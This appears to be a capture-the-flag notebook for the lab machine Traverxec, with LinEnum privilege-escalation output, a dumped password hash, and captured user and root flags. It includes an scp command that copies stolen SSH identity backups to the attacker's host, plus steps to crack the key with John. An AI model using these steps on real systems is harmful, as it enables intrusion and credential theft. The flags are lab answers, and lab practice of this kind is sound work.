-r-sr-xr-x 1 root root 13628 Nov 12 2019 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14320 Nov 12 2019 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus 51184 Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 157192 Oct 12 2019 /usr/bin/sudo
-rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
-rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
-rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn

[-] SGID files:
-rwxr-sr-x 1 root shadow 39616 Feb 14 2019 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root mail 18944 Dec 3 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root tty 34896 Jan 10 2019 /usr/bin/wall
-rwxr-sr-x 1 root shadow 31000 Jul 27 2018 /usr/bin/expiry
-rwxr-sr-x 1 root tty 14736 May 4 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 43568 Jun 23 2019 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 71816 Jul 27 2018 /usr/bin/chage
-rwxr-sr-x 1 root ssh 321672 Oct 6 2019 /usr/bin/ssh-agent

[+] Files with POSIX capabilities set:
/usr/bin/ping = cap_net_raw+ep

[+] Private SSH keys found!:
/home/david/LinEnum.sh
/home/david/.ssh/id_rsa

[+] AWS secret keys found!:
/home/david/LinEnum.sh

[-] NFS displaying partitions and filesystems - you need to check if exotic filesystems
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point> <type> <options> <dump> <pass>
# / was on /dev/sda1 during installation
UUID=b94f39a4-394e-4755-bdc1-205c141583a6 / ext4 errors=remount-ro 0 1
# swap was on /dev/sda5 during installation
UUID=4694341c-5642-4505-8593-0e44d799f109 none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0

[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 144 Oct 25 2019 /etc/kernel-img.conf
-rw-r--r-- 1 root root 604 Jun 26 2016 /etc/deluser.conf
-rw-r--r-- 1 root root 2007 Oct 25 2019 /etc/rsyslog.conf
-rw-r--r-- 1 root root 435 Aug 22 2018 /etc/logrotate.conf
-rw-r--r-- 1 root root 5713 Oct 25 2019 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 552 Feb 14 2019 /etc/pam.conf
-rw-r--r-- 1 root root 1260 Dec 14 2018 /etc/ucf.conf
-rw-r--r-- 1 root root 191 Apr 25 2019 /etc/libaudit.conf
-rw-r--r-- 1 root root 2969 Feb 26 2019 /etc/debconf.conf
-rw-r--r-- 1 root root 2584 Aug 1 2018 /etc/gai.conf
-rw-r--r-- 1 root root 2384 Oct 25 2019 /etc/sysctl.conf
-rw-r--r-- 1 root root 2981 Oct 25 2019 /etc/adduser.conf
-rw-r--r-- 1 root root 9 Aug 7 2006 /etc/host.conf
-rw-r--r-- 1 root root 812 Dec 15 2018 /etc/mke2fs.conf
-rw-r--r-- 1 root root 510 Oct 25 2019 /etc/nsswitch.conf
-rw-r--r-- 1 root root 642 Mar 1 2019 /etc/xattr.conf
-rw-r--r-- 1 root root 346 Jan 14 2018 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 5060 Oct 26 2018 /etc/hdparm.conf
-rw-r--r-- 1 root root 61 Oct 25 2019 /etc/resolv.conf
-rw-r--r-- 1 root root 3267 Aug 28 2019 /etc/reportbug.conf
-rw-r--r-- 1 root root 34 Mar 2 2018 /etc/ld.so.conf

[-] Current user's history files:
lrwxrwxrwx 1 root root 9 Oct 25 2019 /home/david/.bash_history -> /dev/null

[-] Location and contents (if accessible) of .bash_history file(s):
/home/david/.bash_history

[-] Location and Permissions (if accessible) of .bak file(s):
-rw------- 1 root root 708 Oct 25 2019 /var/backups/group.bak
-rw------- 1 root root 1395 Oct 25 2019 /var/backups/passwd.bak
-rw------- 1 root shadow 597 Oct 25 2019 /var/backups/gshadow.bak
-rw------- 1 root shadow 940 Oct 27 2019 /var/backups/shadow.bak

[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Oct 25 2019 .
drwxr-xr-x 12 root root 4096 Oct 25 2019 ..

### SCAN COMPLETE ####################################

Running Processes
Process List

File System
Writeable Files\Directories
Directory List

Host Information
Operating System
Architecture
Domain
Installed Updates

www-data@traverxec:/var/nostromo/conf$ cat ./.htpasswd
cat ./.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

from nhttpd.conf
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www

Changing back into david's home folder, I try to list out the public_www folder and actually get a result of a protected-file-area, which has a backup of ssh identities. Time to see if I can snag that file.

$ scp ./public_www/protected-file-area/backup-ssh-identity-files.tgz kali@10.10.14.7:/home/kali/Desktop/Traverxec/sshbackups.tgz
tar -xvf sshbackups.tgz

We get these files.
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub

SSH as David time.

Aaaaannnnddd ROADBLOCK. Of course the RSA key has a passphrase. No big deal. I can kick that into John and hopefully crack it with rockyou.txt.

kali@kali:~/Desktop/Traverxec/home/david/.ssh$ python3 /usr/share/john/ssh2john.py id_rsa > ../../../hash.txt

Software Versions
Software Versions
Potential Exploits

Proof\Flags\Other
david@traverxec:~$ cat user.txt
7db0b48469606a42cec20750d9782f3d
root@traverxec:/home/david/bin# cat /root/root.txt
9aa36a6d76f785dfd320a478f6e0d906

Passwords
www-data@traverxec:/var/nostromo/conf$ cat ./.htpasswd
cat ./.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

Hashes

Post Exploitation
Check Nostromo configs and .htp

Script Results
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Enabled

Scan started at:
Wed 26 Aug 2020 11:36:59 PM EDT

### SYSTEM ##############################################
[-] Kernel